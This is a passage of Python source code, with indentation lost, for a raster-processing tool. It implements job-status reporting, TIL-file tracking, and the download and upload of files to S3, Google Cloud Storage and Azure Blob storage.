if (_value not in [CRPT_YES, CRPT_NO]):
self._base.message('Invalid value ({}) at (Reporter)'.format(
_value), self._base.const_critical_text)
return False
if (not e):
if (_input in self._input_list_info and
self.CRPT_URL_TRUENAME in self._input_list_info[_input]):
(p, e) = os.path.splitext(
self._input_list_info[_input][self.CRPT_URL_TRUENAME])
if (not e): # still no extension?
self._base.message(
'Invalid input/no extension for ({})/Reporter'.format(_input), self._base.const_warning_text)
self._input_list_info[_input][_type] = _value
return False
self._input_list_info[_input][_type] = _value
return True
def addHeader(self, key, value):
if (not key or
value is None):
return False
self._header[key.lower()] = value
return True
def removeHeader(self, key):
if (not key):
return False
if (not key.lower() in self._header):
return False
del self._header[key.lower()]
return True
def addFile(self, file):
if (not file):
return False
_file = file.replace('\\', '/')
_get_store = self.findWith(_file)
if (_get_store and
_get_store == _file):
return False # no duplicate entries allowed.
self._input_list.append(_file)
return True
@property
def items(self):
return self._input_list
@property
def operation(self):
Operation = COP.lower()
if (Operation not in self._header):
return None
op = self._header[Operation]
if (not op):
return None
if (op.lower().startswith(COP_LAMBDA)):
return op # lambda op values are case-sensitive.
return op.lower() # lower case values for all other operations.
@property
def root(self):
if (not self._input_list):
return ''
_root = self._input_list[0]
if (CRESUME_HDR_INPUT in self._header):
_root = self._header[CRESUME_HDR_INPUT]
if (_root.lower().startswith('http')):
if (not _root.endswith('/')):
_root += '/'
return _root
def read(self, readCallback=None):
try:
with open(self._report_file, 'r', encoding='utf-8') as _fptr:
ln = _fptr.readline()
hdr_skipped = False
# If 'resume=='retryall', files will be copied/processed/uploaded regardless of the individual file status.
retryAll = False
while(ln):
ln = ln.strip()
if (not ln or
ln.startswith('##')): # ignore empty-lines and comment lines (beginning with '##')
ln = _fptr.readline()
continue
if (readCallback): # client side callback support.
readCallback(ln)
lns = ln.split(self.CVSCHAR)
_fname = lns[0].strip().replace('\\', '/')
if (_fname.startswith(self.CHEADER_PREFIX)):
_hdr = _fname.replace(
self.CHEADER_PREFIX, '').split('=')
if (len(_hdr) > 1):
_hdr_key = _hdr[0].strip()
_hdr.pop(0)
_hdr_val = '='.join(_hdr).strip()
if (_hdr_key == CTEMPINPUT or
_hdr_key == CTEMPOUTPUT):
if (not _hdr_val.endswith('/')):
_hdr_val += '/'
elif (_hdr_key == Lambda.queue_length):
if (not str.isdigit(_hdr_val)):
ln = _fptr.readline()
continue
# filter {Lambda.queuelength}
_hdr_val = int(_hdr_val)
elif (_hdr_key == self.CHDR_MODE):
_hdr_val = _hdr_val.lower() # lower case (mode)
self.addHeader(_hdr_key, _hdr_val)
ln = _fptr.readline()
continue
if (not _fname or
not hdr_skipped): # do not accept empty lines.
if (ln.find(CRPT_SOURCE) >= 0 and
ln.find(CRPT_COPIED)): # skip line if it's the column header without the '#' prefix?
ln = _fptr.readline()
if (_fname):
hdr_skipped = True
if (CRESUME_HDR_INPUT in self._header):
_input = self._header[CRESUME_HDR_INPUT]
self._header[CRESUME_HDR_INPUT] = self._base.convertToForwardSlash(
_input, True) # force suffix with '/' for input folders
_input = _input.lower()
if (_input.startswith('http://') or
_input.startswith('https://')):
self._isInputHTTP = True
if (not retryAll and
CRESUME_ARG in self._header):
if (self._header[CRESUME_ARG].lower() == CRESUME_ARG_VAL_RETRYALL):
retryAll = True
continue
# for now, previously stored status values aren't used.
_copied = '' if len(lns) <= 1 else lns[1].strip()
_processed = '' if len(lns) <= 2 else lns[2].strip()
_uploaded = '' if len(lns) <= 3 else lns[3].strip()
if (retryAll):
_copied = _processed = _uploaded = '' # reset all status
if (self.addFile(_fname)):
self._input_list_info[_fname] = {
CRPT_COPIED: _copied,
CRPT_PROCESSED: _processed,
CRPT_UPLOADED: _uploaded
}
ln = _fptr.readline()
except Exception as exp:
self._base.message('{}'.format(str(exp)),
self._base.const_critical_text)
return False
return True
def findExact(self, input):
if (not self._input_list):
return None
for f in self._input_list:
if (f == input):
return f
return None
def findWith(self, input):
if (not self._input_list):
return None
for f in self._input_list:
if (f.find(input) != -1):
return f
return None
# successful job files can be moved over to a given folder.
def moveJobFileToPath(self, path):
if (not path):
return False
try:
get_tile = os.path.basename(self._report_file)
mk_path = os.path.join(path, get_tile)
if (not os.path.exists(path)):
makedirs(path)
self._base.message('[MV] {}'.format(mk_path))
shutil.move(self._report_file, mk_path)
except Exception as e:
self._base.message('({})'.format(str(e)),
self._base.const_critical_text)
return False
return True
def hasFailures(self):
if (not self._input_list):
return False
for f in self:
if (self._input_list_info[f][CRPT_COPIED] == CRPT_NO or
self._input_list_info[f][CRPT_PROCESSED] == CRPT_NO or
self._input_list_info[f][CRPT_UPLOADED] == CRPT_NO):
return True
return False
def write(self):
try:
_frmt = '{}/{}/{}/{}\n'.replace('/', self.CVSCHAR)
with open(self._report_file, 'w+', encoding='utf-8') as _fptr:
for key in self._header:
if (self.CHDR_OP == key):
# op==createjob header is not written out into the output .orjob file.
# This allows the .orjob file to be used with the -input arg to process the data separately.
if (self._header[key] == COP_CREATEJOB):
continue
_fptr.write('{} {}={}\n'.format(
self.CHEADER_PREFIX, key, self._header[key]))
_fptr.write(_frmt.format(CRPT_SOURCE, CRPT_COPIED,
CRPT_PROCESSED, CRPT_UPLOADED))
for f in self._input_list:
_fptr.write(_frmt.format(f,
self._input_list_info[f][CRPT_COPIED] if f in self._input_list_info else '',
self._input_list_info[f][CRPT_PROCESSED] if f in self._input_list_info else '',
self._input_list_info[f][CRPT_UPLOADED] if f in self._input_list_info else ''
))
except Exception as exp:
self._base.message('{}'.format(str(exp)),
self._base.const_critical_text)
return False
return True
def writeTimeItReport(self, reportFile):
import csv
try:
with open(reportFile, 'w', newline='') as csvfile:
fieldnames = [TimeIt.Name, TimeIt.Conversion,
TimeIt.Overview, TimeIt.Download, TimeIt.Upload]
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for f in self._base.timedInfo['files']:
writer.writerow(f)
except Exception as e:
self._base.message('TimeIt> {}'.format(str(e)),
self._base.const_critical_text)
return False
return True
def walk(self):
walk_tree = []
for f in self:
(d, f) = os.path.split(f)
walk_tree.append(('{}/'.format(d), (), (f.strip(),)))
return walk_tree
def __iter__(self):
return iter(self._input_list)
def syncRemoteToLocal(self, statusInfo):
if (not statusInfo):
return False
InputListInfo = 'input_list_info'
if (InputListInfo not in statusInfo):
return False
for entry in statusInfo[InputListInfo]:
status = statusInfo[InputListInfo][entry]
for _type in status:
if (not status[_type]):
continue
self.updateRecordStatus(entry, _type, status[_type])
return True
def addMetadata(self, file, key, value):
if (file is None or
key is None or
value is None):
self._base.message('addMetadata/null',
self._base.const_critical_text)
return False
_file = file.replace('\\', '/')
srchIndex = -1
try:
srchIndex = list(self._input_list_info.keys()).index(_file)
except Exception as e:
return False
if (srchIndex not in self._input_list_info_ex):
self._input_list_info_ex[srchIndex] = {}
self._input_list_info_ex[srchIndex][key] = value
return True
def getMetadata(self, file, key):
if (file is None or
key is None):
self._base.message('getMetadata/null',
self._base.const_critical_text)
return None
_file = file.replace('\\', '/')
srchIndex = -1
try:
srchIndex = list(self._input_list_info.keys()).index(_file)
except Exception as e:
return None
if (key not in self._input_list_info_ex[srchIndex]):
return None
return self._input_list_info_ex[srchIndex][key]
def __len__(self):
return len(self._input_list)
def __getitem__(self, index):
return self._input_list[index]
# class to read/gather info on til files.
class TIL:
CRELATED_FILE_COUNT = 'related_file_count'
CPROCESSED_FILE_COUNT = 'processed_file_count'
CKEY_FILES = 'files'
CRASTER_EXT_IN_TIL = 'rasterExtension'
def __init__(self):
self._rasters = []
self._tils = []
self._tils_info = {}
self._output_path = {}
self._defaultTILProcessing = False
@property
def defaultTILProcessing(self):
return self._defaultTILProcessing
@defaultTILProcessing.setter
def defaultTILProcessing(self, value):
self._defaultTILProcessing = value
@property
def TILCount(self):
return len(self._tils)
# add (til) files to process later via (fnc: process).
def addTIL(self, input):
# This when the (til) files are found before the associated (files) could be not found at the (til) location because they may not have been downloaded yet.
_input = input.replace('\\', '/')
if (_input not in self._tils):
self._tils.append(_input)
if (not input.lower() in self._tils_info):
self._tils_info[_input.lower()] = {
self.CRELATED_FILE_COUNT: 0,
self.CPROCESSED_FILE_COUNT: 0,
self.CKEY_FILES: [],
self.CRASTER_EXT_IN_TIL: None
}
return True
def findOriginalSourcePath(self, processPath):
for path in self._output_path:
if (self._output_path[path] == processPath):
return path
return None
def fileTILRelated(self, input):
idx = input.split('.')
f = idx[0]
f = f.replace('\\', '/').split('/')
f = f[len(f) - 1]
for t in self._tils:
if (t.find(f) >= 0):
return True
for t in self._rasters:
if (t.startswith(f)):
return True
return False
def addFileToProcessed(self, input):
for t in self._tils:
_key_til_info = t.lower()
if (_key_til_info in self._tils_info):
if (input in self._tils_info[_key_til_info][self.CKEY_FILES]):
self._tils_info[_key_til_info][self.CPROCESSED_FILE_COUNT] += 1
return True
return False
def isAllFilesProcessed(self, input):
if (not input):
return False
if (not input.lower() in self._tils_info):
return False
_key_til_info = input.lower()
if (self._tils_info[_key_til_info][self.CRELATED_FILE_COUNT] ==
self._tils_info[_key_til_info][self.CPROCESSED_FILE_COUNT]):
return True
return False
def _processContent(self, fileName, line):
if (not line or
not fileName):
return False
_line = line
ln = _line.strip()
CBREAK = 'filename ='
if (ln.find(CBREAK) == -1):
return True
splt = ln.replace('"', '').replace(';', '').split(CBREAK)
if (len(splt) == 2):
file_name = splt[1].strip()
if (file_name not in self._rasters):
self._rasters.append(file_name)
_key_til_info = fileName.lower()
if (not self._tils_info[_key_til_info][self.CRASTER_EXT_IN_TIL]):
rasterExtension = RasterAssociates.findExtension(file_name)
if (rasterExtension):
self._tils_info[_key_til_info][self.CRASTER_EXT_IN_TIL] = rasterExtension
if (_key_til_info in self._tils_info):
self._tils_info[_key_til_info][self.CRELATED_FILE_COUNT] += 1
self._tils_info[_key_til_info][self.CKEY_FILES].append(
file_name)
return True
def processInMemoryTILContent(self, fileName, content):
if (content is None):
return False
lines = content.split('\n')
for line in lines:
self._processContent(fileName, line)
return True
def process(self, input):
if (not input or
len(input) == 0):
return False
if (not os.path.exists(input)):
return False
with open(input, 'r') as _fp:
_line = _fp.readline()
while (_line):
self._processContent(input, _line)
_line = _fp.readline()
return True
# set the output path for each til entry on list.
def setOutputPath(self, input, output):
if (input not in self._output_path):
self._output_path[input] = output
def getOutputPath(self, input):
if (input not in self._output_path):
return None
return self._output_path[input]
def find(self, input):
for _t in self._tils_info:
if (input in self._tils_info[_t][self.CKEY_FILES]):
if (self._tils_info[_t][self.CRELATED_FILE_COUNT] <= 1):
return False
return True
return False
def __iter__(self):
return iter(self._tils)
class ProgressPercentage(object):
def __init__(self, base, filename):
self._base = base # base
self._filename = filename
self._size = float(os.path.getsize(filename))
self._seen_so_far = 0
self._lock = threading.Lock()
def __call__(self, bytes_amount):
with self._lock:
self._seen_so_far += bytes_amount
percentage = (self._seen_so_far / self._size) * 100
message = "%s / %d (%.2f%%)" % (
self._seen_so_far, self._size,
percentage)
if (self._base is not None):
if (hasattr(self._base, 'message')):
self._base.message(message, self._base.const_general_text)
return True
sys.stdout.write(message)
sys.stdout.flush()
class S3Upload:
def __init__(self, base, s3_bucket, s3_path, local_file, acl_policy='private'):
self._base = base # base
self.m_s3_path = s3_path
self.m_local_file = local_file
self.m_s3_bucket = s3_bucket
self.m_acl_policy = 'private' if acl_policy is None or acl_policy.strip() == '' else acl_policy
self.mp = None
pass
def init(self):
try:
from boto3.s3.transfer import S3Transfer, TransferConfig
self.mp = S3Transfer(self.m_s3_bucket.meta.client)
except Exception as e:
self._base.message('({})'.format(str(e)),
self._base.const_critical_text)
return False
return True
@TimeIt.timeOperation
def upload(self, **kwargs):
# if (self.m_local_file.endswith('.lrc')): # debug. Must be removed before release.
# return True
self._base.message('[S3-Push] {}'.format(self.m_local_file))
try:
self.mp.upload_file(self.m_local_file, self.m_s3_bucket.name, self.m_s3_path, extra_args={
'ACL': self.m_acl_policy}, callback=ProgressPercentage(self._base, self.m_local_file))
except Exception as e: # trap any connection issues.
msg = str(e)
isRefreshToken = msg.find('(ExpiredToken)') != -1
if (isRefreshToken):
if ('fptrRefresh' in kwargs):
self.m_s3_bucket = kwargs['fptrRefresh']()
if (self.m_s3_bucket):
ret = self.init() # will ignore (ret) value to allow (retry) by the caller
self._base.message('recycled at {} -> ret from refreshCallback {}\n'.format(datetime.utcnow(), ret))
self._base.message('({})'.format(msg),
self._base.const_warning_text if isRefreshToken else self._base.const_critical_text)
return False
return True
def __del__(self):
if (self.mp):
self.mp = None
class SlnTMStringIO:
def __init__(self, size, buf=''):
self.m_size = size
self.m_buff = mmap.mmap(-1, self.m_size)
self.m_spos = self.m_fsize = 0
def close(self):
self.m_buff.close()
del self.m_buff
pass
def next(self):
pass
def seek(self, pos, mode=0):
if mode == 1:
pos += self.m_spos
elif mode == 2:
pos += len(self.m_buff)
self.m_spos = max(0, pos)
def tell(self):
return self.m_spos
def read(self, n=-1):
buff_len = self.m_fsize
nRead = (self.m_spos + n)
if (nRead > buff_len):
n = n - (nRead - buff_len)
self.m_buff.seek(self.m_spos, 0)
self.m_spos += n
return self.m_buff.read(n)
def readline(self, length=None):
pass
def readlines(self, sizehint=0):
pass
def truncate(self, size=None):
pass
def write(self, s):
self.m_buff.write(s)
self.m_fsize += len(s)
pass
def writelines(self, iterable):
pass
def flush(self):
pass
def getvalue(self):
pass
class Store(object):
# log error types
const_general_text = 0
const_warning_text = 1
const_critical_text = 2
const_status_text = 3
# ends
# class usage (Operation) modes
CMODE_SCAN_ONLY = 0
CMODE_DO_OPERATION = 1
# ends
# cloud-type
TypeAmazon = 'amazon'
TypeAzure = 'azure'
TypeGoogle = 'google'
TypeAlibaba = 'alibaba'
# ends
def __init__(self, account_name, account_key, profile_name, base):
self._account_name = account_name
self._account_key = account_key
self._profile_name = profile_name
self._base = base
self._event_postCopyToLocal = None
self._include_subFolders = False
self._mode = self.CMODE_DO_OPERATION
def init(self):
return True
def upload(self, file_path, container_name, parent_folder, properties=None):
self._input_file_path = file_path
self._upl_container_name = container_name
self._upl_parent_folder = parent_folder
self._upl_properties = properties
return True
def setSource(self, container_name, parent_folder, properties=None):
self._dn_container_name = container_name
self._dn_parent_folder = parent_folder
self._dn_properties = properties
return True
def readProfile(self, account_name, account_key):
config = ConfigParser.RawConfigParser()
userHome = '{}/{}/{}'.format(os.path.expanduser('~').replace(
'\\', '/'), '.OptimizeRasters/Microsoft', 'azure_credentials')
with open(userHome) as fptr:
config.read_file(fptr)
if (not config.has_section(self._profile_name)):
return (None, None)
azure_account_name = config.get(self._profile_name, account_name) if config.has_option(
self._profile_name, account_name) else None
azure_account_key = config.get(self._profile_name, account_key) if config.has_option(
self._profile_name, account_key) else None
return (azure_account_name, azure_account_key)
def message(self, msg, status=0): # type (0: general, 1: warning, 2: critical, 3: statusText)
if (self._base):
self._base.message(msg, status)
return
status_text = ''
if (status == 1):
status_text = 'Warning'
elif (status == 2):
status_text = 'Err'
print('{}{}{}'.format(status_text, '. ' if status_text else '', msg))
class Google(Store):
DafaultStorageDomain = 'http://storage.googleapis.com/'
def __init__(self, project_name, client_id, client_secret, profile_name=None, base=None):
super(Google, self).__init__(
client_id, client_secret, profile_name, base)
self._browsecontent = []
self._projectName = project_name
self._client = None
self._bucket = None
def init(self, bucketName):
try:
if (self._profile_name is None or
not bucketName):
return False
if (not self._projectName):
with open(self._profile_name, 'r') as reader:
serviceJson = json.load(reader)
Project_Id = 'project_id'
if (Project_Id not in serviceJson):
raise Exception(
'(Project_Id) key isn\'t found in file ({})'.format(self._profile_name))
self._projectName = serviceJson[Project_Id]
os.environ['GCLOUD_PROJECT'] = self._projectName
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = self._profile_name
from google.cloud import storage
self._client = storage.Client()
self._bucket = self._client.lookup_bucket(bucketName)
if (self._bucket is None):
raise Exception('Bucket ({}) isn\'t found!'.format(bucketName))
except Exception as e:
self.message(str(e), self.const_critical_text)
return False
return True
@property
def id(self):
return 'gs' # short for google-storage
def _addBrowseContent(self, blobName):
if (not blobName):
return False
if (self._mode == self.CMODE_SCAN_ONLY):
self._browsecontent.append(blobName)
return True
return False
def getBrowseContent(self):
return self._browsecontent
def browseContent(self, bucketName, parentFolder, cb=None, precb=None):
url = parentFolder
if (url == '/' or
url is None):
url = '' # defaults to bucket root.
super(Google, self).setSource(bucketName, url)
for item in self._bucket.list_blobs(prefix=url, delimiter='/{}'.format('*' if self._include_subFolders else '')):
self._addBrowseContent(item.name)
if (precb and
self._base.getUserConfiguration):
_resumeReporter = self._base.getUserConfiguration.getValue(
CPRT_HANDLER)
if (_resumeReporter):
remotePath = _resumeReporter._header[CRESUME_HDR_INPUT]
precb(item.name if remotePath == '/' else item.name.replace(remotePath,
''), remotePath, _resumeReporter._header[CRESUME_HDR_OUTPUT])
if (cb and
self._mode != self.CMODE_SCAN_ONLY):
cb(item.name)
return True
def copyToLocal(self, blob_source):
if (not blob_source or
self._dn_parent_folder is None): # note> empty value in parent path is allowed but not (None)
self.message('{}> Not initialized'.format(
self.id), self.const_critical_text)
return False
try:
_user_config = self._base.getUserConfiguration
_resumeReporter = _user_config.getValue(CPRT_HANDLER)
# what does the restore point say about the (blob_source) status?
if (_resumeReporter):
# if -subs=true but not on .orjob/internal list, bail out early
if (blob_source not in _resumeReporter._input_list_info):
return True
if (blob_source.endswith('/')): # skip folders.
return True
_get_rstr_val = _resumeReporter.getRecordStatus(
blob_source, CRPT_COPIED)
if (_get_rstr_val == CRPT_YES):
self.message('{} {}'.format(
CRESUME_MSG_PREFIX, blob_source))
return True
# ends
_googleParentFolder = _user_config.getValue(
CIN_GOOGLE_PARENTFOLDER, False)
_googlePath = blob_source if _googleParentFolder == '/' else blob_source.replace(
_googleParentFolder, '')
output_path = _user_config.getValue(
CCFG_PRIVATE_OUTPUT, False) + _googlePath
isUpload = self._base.getBooleanValue(
_user_config.getValue(CCLOUD_UPLOAD))
if (_user_config.getValue(CISTEMPOUTPUT) and
isUpload):
output_path = _user_config.getValue(
CTEMPOUTPUT, False) + _googlePath
if (not output_path):
return False
is_raster = False
is_tmp_input = self._base.getBooleanValue(
_user_config.getValue(CISTEMPINPUT))
primaryRaster = None
if (_resumeReporter and
is_tmp_input):
primaryRaster = _resumeReporter._m_rasterAssociates.findPrimaryExtension(
_googlePath)
if (filterPaths(blob_source, _user_config.getValue(CCFG_EXCLUDE_NODE))):
return False
elif (primaryRaster or # if the blob_source is an associated raster file, consider it as a raster.
filterPaths(blob_source, _user_config.getValue(CCFG_RASTERS_NODE))):
isTIL = output_path.lower().endswith(CTIL_EXTENSION_)
if (is_tmp_input):
if (not isTIL):
output_path = _user_config.getValue(
CTEMPINPUT, False) + _googlePath
is_raster = not isTIL
if (_user_config.getValue('Pyramids') == CCMD_PYRAMIDS_ONLY):
return False
flr = os.path.dirname(output_path)
if (not os.path.exists(flr)):
try:
makedirs(flr)
except Exception as e:
raise
if (is_raster):
if (not is_tmp_input):
return True
writeTo = output_path
self.message('[{}-Pull] {}'.format(self.id, blob_source))
if (not is_raster):
writeTo = self._base.renameMetaFileToMatchRasterExtension(
writeTo)
blob = self._bucket.get_blob(blob_source)
blob.download_to_filename(writeTo)
if (self._event_postCopyToLocal):
self._event_postCopyToLocal(writeTo)
# take care of (til) inputs.
if (til):
if (writeTo.lower().endswith(CTIL_EXTENSION_)):
if (til.addTIL(writeTo)):
til.setOutputPath(writeTo, writeTo)
# ends
# mark download/copy status
if (_resumeReporter):
_resumeReporter.updateRecordStatus(
blob_source, CRPT_COPIED, CRPT_YES)
# ends
# copy metadata files to -clonepath if set
# do not copy raster associated files to clone path.
if (not is_raster):
self._base.copyMetadataToClonePath(output_path)
# ends
# Handle any post-processing, if the final destination is to S3, upload right away.
if (isUpload):
if (self._base.getBooleanValue(_user_config.getValue(CISTEMPINPUT))):
if (is_raster):
return True
_is_success = self._base.S3Upl(writeTo, user_args_Callback)
if (not _is_success):
return False
# ends
except Exception as e:
self.message('({})'.format(str(e)), self.const_critical_text)
if (_resumeReporter):
_resumeReporter.updateRecordStatus(
blob_source, CRPT_COPIED, CRPT_NO)
return False
return True
def upload(self, input_path, container_name, parent_folder, properties=None):
if (not input_path or
not container_name or
parent_folder is None):
return False
_parent_folder = parent_folder
if (not _parent_folder):
if (self._base.getUserConfiguration):
_parent_folder = self._base.getUserConfiguration.getValue(
CIN_GOOGLE_PARENTFOLDER)
if (_parent_folder == '/' or
_parent_folder is None):
_parent_folder = ''
if (properties):
if (CTEMPOUTPUT in properties):
_tempoutput = properties[CTEMPOUTPUT]
_parent_folder = os.path.dirname(input_path.replace(
'\\', '/').replace(_tempoutput, _parent_folder))
usrPath = self._base.getUserConfiguration.getValue(
CUSR_TEXT_IN_PATH, False)
# default insert pos (sub-folder loc) for user text in output path
usrPathPos = CHASH_DEF_INSERT_POS
if (usrPath):
(usrPath, usrPathPos) = usrPath.split(CHASH_DEF_SPLIT_CHAR)
_parent_folder = self._base.insertUserTextToOutputPath('{}{}'.format(
_parent_folder, '/' if not _parent_folder.endswith('/') else ''), usrPath, usrPathPos)
super(Google, self).upload(input_path,
container_name, _parent_folder, properties)
localPath = self._input_file_path
cloudPath = self._base.convertToForwardSlash(os.path.join(
self._upl_parent_folder, os.path.basename(localPath)), False)
try:
self.message('[{}-Push] {}'.format(self.id, cloudPath))
from google.cloud import storage
# has to use a new client,bucket object/upload_from_filename api has issues in a threaded environment.
client = storage.Client()
bucket = client.get_bucket(self._bucket.name)
blob = bucket.blob(cloudPath)
blob.upload_from_filename(localPath)
except Exception as e:
self.message(str(e), self.const_critical_text)
return False
return True
class Azure(Store):
CHUNK_MIN_SIZE = 4 * 1024 * 1024
COUT_AZURE_ACCOUNTNAME_INFILE = 'azure_account_name'
COUT_AZURE_ACCOUNTKEY_INFILE = 'azure_account_key'
DefaultDomain = 'blob.core.windows.net'
class azBlobInternal(object):
def __init__(self, name):
self.name = name
@property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
def __init__(self, account_name, account_key, profile_name=None, base=None):
super(Azure, self).__init__(
account_name, account_key, profile_name, base)
self._browsecontent = []
def init(self, direction=CS3STORAGE_IN):
try:
if (not self._account_name):
(self._account_name, self._account_key) = self.readProfile(
self.COUT_AZURE_ACCOUNTNAME_INFILE, self.COUT_AZURE_ACCOUNTKEY_INFILE)
self._SASToken = self._SASBucket = None
if (self._account_name):
if (not self._account_name.lower().startswith('http')):
self._account_name = 'https://{}.blob.core.windows.net'.format(
self._account_name)
breakSAS = self._account_name.split('?')
if (len(breakSAS) == 2):
self._SASToken = breakSAS[-1]
# get bucket name from the SAS string.
self._SASBucket = breakSAS[0].split('/')[-1]
self._account_name = breakSAS[0][:breakSAS[0].rfind('/')]
if (self._base):
self._base.getUserConfiguration.setValue(
CFGAZSAS if direction == CS3STORAGE_IN else CFGAZSASW, self._SASToken)
if (not self._account_name and
not self._SASToken):
return False
from azure.storage.blob import BlobServiceClient
self._blobSrvCli = BlobServiceClient(
account_url=self._account_name, credential=self._SASToken if self._SASToken else self._account_key)
self._blob_service = None
if (self._base):
container = self._base.getUserConfiguration.getValue(
CIN_AZURE_CONTAINER if direction == CS3STORAGE_IN else COUT_AZURE_CONTAINER)
self._blob_service = self._blobSrvCli.get_container_client(
container)
ACL = None
if (self._base.getBooleanValue(self._base.getUserConfiguration.getValue(UseToken))):
ACL = {'public_access': None}
try:
if (ACL is None):
ACL = self._blob_service.get_container_access_policy()
if (not isinstance(ACL, dict)):
ACL = None
if (ACL):
if ('public_access' not in ACL or
ACL['public_access'] is not None):
ACL = None
except Exception as e:
pass
if (ACL and
ACL['public_access'] is None): # internally access rights get checked on the input/output containers.
if (self._base):
if (direction == CS3STORAGE_IN):
self._base.getUserConfiguration.setValue(
UseToken, True)
else:
self._base.getUserConfiguration.setValue(
UseTokenOnOuput, True)
os.environ['AZURE_STORAGE_ACCOUNT'] = self._account_name.split('.')[
0].split('//')[1]
if (self._account_key):
os.environ['AZURE_STORAGE_ACCESS_KEY'] = self._account_key
except Exception as e:
self.message(str(e), self.const_critical_text)
return False
return True
@property
def getAccountName(self):
return self._account_name
def _runBlock(self, bobj, fobj, container_name, blob_name, block_id):
fobj.seek(0)
bobj.put_block(container_name, blob_name, fobj.read(), block_id)
fobj.close()
del fobj
def _addBrowseContent(self, blobName):
if (not blobName):
return False
if (self._mode == self.CMODE_SCAN_ONLY):
self._browsecontent.append(blobName)
return True
return False
def getBrowseContent(self):
return self._browsecontent
def browseContent(self, container_name, parent_folder, cb=None, precb=None):
super(Azure, self).setSource(container_name, parent_folder)
parentDepth = len(parent_folder.split('/'))
blobs = []
_resumeReporter = self._base.getUserConfiguration.getValue(
CPRT_HANDLER)
if (_resumeReporter):
for i in range(0, len(_resumeReporter._input_list)):
if (_resumeReporter._input_list[i].endswith('/')):
continue
szBlobs = self._blob_service.walk_blobs(
name_starts_with=_resumeReporter._input_list[i])
try: # Can throw if the necessary account access permissions are not valid. walk_blobs response is misleading.
bFound = False
for blob in szBlobs:
if (not bFound):
bFound = True
blobs.append(self.azBlobInternal(blob.name))
if (not bFound):
_resumeReporter.updateRecordStatus(
_resumeReporter._input_list[i], CRPT_COPIED, CRPT_NO)
except Exception as e:
break
else:
blobs = self._blob_service.list_blobs(
name_starts_with=parent_folder)
for blob in blobs:
levels = blob.name.split('/')
if (not self._include_subFolders):
if (len(levels) > parentDepth):
continue
name = blob.name
if (_resumeReporter):
if (not name in _resumeReporter._input_list):
continue
self._addBrowseContent(name)
if (precb and
self._base.getUserConfiguration):
if (_resumeReporter):
remotePath = _resumeReporter._header[CRESUME_HDR_INPUT]
precb(name if remotePath == '/' else name.replace(remotePath, ''),
remotePath, _resumeReporter._header[CRESUME_HDR_OUTPUT])
if (cb and
self._mode != self.CMODE_SCAN_ONLY):
cb(name)
return True
@TimeIt.timeOperation
def __copyRemoteToLocal(self, blob_source, writeTo, **kwargs):
try:
_resumeReporter = self._base.getUserConfiguration.getValue(
CPRT_HANDLER)
cli = self._blob_service.get_blob_client(blob_source)
with open(writeTo, 'wb') as writer:
cli.download_blob().download_to_stream(writer)
_, f = os.path.split(blob_source)
baseName = f.split(TarGzExt)[0]
if (f.lower().endswith(TarGzExt)):
tarFile = tarfile.open(writeTo)
extractTo = os.path.join(os.path.dirname(writeTo), baseName)
tarFile.extractall(extractTo)
bToCloud = self._base.getBooleanValue(
self._base.getUserConfiguration.getValue(CCLOUD_UPLOAD))
for x in tarFile.getmembers():
if (int(x.type) != 0):
continue
if (_resumeReporter):
name = '{}/{}/{}'.format(
blob_source[:blob_source.rfind('/')], baseName, x.name)
_resumeReporter.addFile(name)
_resumeReporter._input_list_info[name] = {
CRPT_COPIED: CRPT_YES,
CRPT_PROCESSED: '',
CRPT_UPLOADED: ''
}
if (not filterPaths(x.name, self._base.getUserConfiguration.getValue(CCFG_RASTERS_NODE))):
if (not bToCloud):
trail = '{}/{}'.format(baseName, x.name)
dst = os.path.join(
_resumeReporter._header[CRESUME_HDR_OUTPUT], os.path.dirname(trail))
if (not os.path.exists(dst)):
os.makedirs(dst)
shutil.move(os.path.join(
os.path.dirname(writeTo), trail), dst)
continue
raster_buff.append(
{'dst': _resumeReporter._header[CRESUME_HDR_OUTPUT], 'f': name.replace(_resumeReporter._header[CRESUME_HDR_INPUT], ''), 'src': _resumeReporter._header[CRESUME_HDR_INPUT]})
tarFile.close()
nLen = len(_resumeReporter._header[CRESUME_HDR_INPUT])
for i in range(0, len(raster_buff)):
if (raster_buff[i]['f'] == blob_source[nLen:]):
raster_buff.pop(i)
break
if (not bToCloud):
os.remove(writeTo)
except Exception as e:
self._base.message('({})'.format(str(e)),
self._base.const_critical_text)
if (_resumeReporter):
_resumeReporter.updateRecordStatus(
blob_source, CRPT_COPIED, CRPT_NO)
return False
return True
def copyToLocal(self, blob_source, **kwargs):
try:
if (not blob_source):
return False
_user_config = self._base.getUserConfiguration
_resumeReporter = _user_config.getValue(CPRT_HANDLER)
# what does the restore point say about the (blob_source) status?
if (_resumeReporter):
# if -subs=true but not on .orjob/internal list, bail out early
if (blob_source not in _resumeReporter._input_list_info):
return True
_get_rstr_val = _resumeReporter.getRecordStatus(
blob_source, CRPT_COPIED)
if (_get_rstr_val == CRPT_YES):
self._base.message('{} {}'.format(
CRESUME_MSG_PREFIX, blob_source))
return True
# ends
_azureParentFolder = _user_config.getValue(
CIN_AZURE_PARENTFOLDER, False)
_azurePath = blob_source if _azureParentFolder == '/' else blob_source.replace(
_azureParentFolder, '')
output_path = _user_config.getValue(
CCFG_PRIVATE_OUTPUT, False) + _azurePath
isUpload = self._base.getBooleanValue(
_user_config.getValue(CCLOUD_UPLOAD))
if (_user_config.getValue(CISTEMPOUTPUT) and
isUpload):
output_path = _user_config.getValue(
CTEMPOUTPUT, False) + _azurePath
is_raster = False
is_tmp_input = self._base.getBooleanValue(
_user_config.getValue(CISTEMPINPUT))
primaryRaster = None
if (_resumeReporter and
is_tmp_input):
primaryRaster = _resumeReporter._m_rasterAssociates.findPrimaryExtension(
_azurePath)
if (filterPaths(blob_source, _user_config.getValue(CCFG_EXCLUDE_NODE))):
return False
elif (primaryRaster or # if the blob_source is an associated raster file, consider it as a raster.
filterPaths(blob_source, _user_config.getValue(CCFG_RASTERS_NODE))):
isTIL = output_path.lower().endswith(CTIL_EXTENSION_)
if (is_tmp_input):
if (not isTIL):
output_path = _user_config.getValue(
CTEMPINPUT, False) + _azurePath
is_raster = not isTIL
if (_user_config.getValue('Pyramids') == CCMD_PYRAMIDS_ONLY):
return False
if (not blob_source or
not output_path or
not self._dn_parent_folder):
self._base.message('Azure> Not initialized',
self._base.const_critical_text)
return False
flr = os.path.dirname(output_path)
if (not os.path.exists(flr)):
try:
makedirs(flr)
